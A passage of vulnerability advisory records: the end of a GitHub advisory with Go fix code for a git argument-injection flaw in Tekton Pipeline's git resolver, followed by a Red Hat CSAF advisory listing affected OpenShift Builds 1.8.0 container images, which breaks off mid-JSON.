`PopulateDefaultParams`, and `checkout` implementation via the shared `git` package. Both are affected.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Validate that `revision` does not begin with `-`** in `PopulateDefaultParams`:\n\n```go\nif strings.HasPrefix(paramsMap[RevisionParam], \"-\") {\n return nil, fmt.Errorf(\"invalid revision %q: must not begin with \u0027-\u0027\", paramsMap[RevisionParam])\n}\n```\n\n**Fix 2 \u2014 Restrict `validateRepoURL` to remote URLs only** (remove local-path support in production builds, or add an explicit admin opt-in feature flag):\n\n```go\nfunc validateRepoURL(url string) bool {\n pattern := `^([^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nApplying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which `--upload-pack` runs locally) and reduces attack surface further.",
"id": "GHSA-94jr-7pqp-xhcq",
"modified": "2026-05-21T22:40:09Z",
"published": "2026-04-21T20:28:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"type": "PACKAGE",
"url": "https://github.com/tektoncd/pipeline"
},
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Tekton Pipeline: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE"
}
RHSA-2026:17546
Vulnerability from csaf_redhat - Published: 2026-05-14 11:39 - Updated: 2026-06-08 13:29Summary
Red Hat Security Advisory: Red Hat OpenShift Builds 1.8.0
Severity
Important
Notes
Topic: Red Hat OpenShift Builds 1.8.0
Details: Releases of Red Hat OpenShift Builds 1.8.0
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver's revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.
8.5 (High)
Affected products
Fixed
24 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x | — |
Vendor Fix
fix
Workaround
|
Known not affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64 | — |
Workaround
|
Threats
Impact
Important
References
11 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Builds 1.8.0",
"title": "Topic"
},
{
"category": "general",
"text": "Releases of Red Hat OpenShift Builds 1.8.0",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:17546",
"url": "https://access.redhat.com/errata/RHSA-2026:17546"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40938",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.8",
"url": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.8"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_17546.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Builds 1.8.0",
"tracking": {
"current_release_date": "2026-06-08T13:29:44+00:00",
"generator": {
"date": "2026-06-08T13:29:44+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.2"
}
},
"id": "RHSA-2026:17546",
"initial_release_date": "2026-05-14T11:39:27+00:00",
"revision_history": [
{
"date": "2026-05-14T11:39:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-14T11:39:35+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-08T13:29:44+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Builds 1.8.0",
"product": {
"name": "Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_builds:1.8::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Builds"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Ad98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ab22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3Ab63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3Acf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-operator-bundle@sha256%3Ab5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778684489"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3A397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Ac918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ac295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Afd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product": {
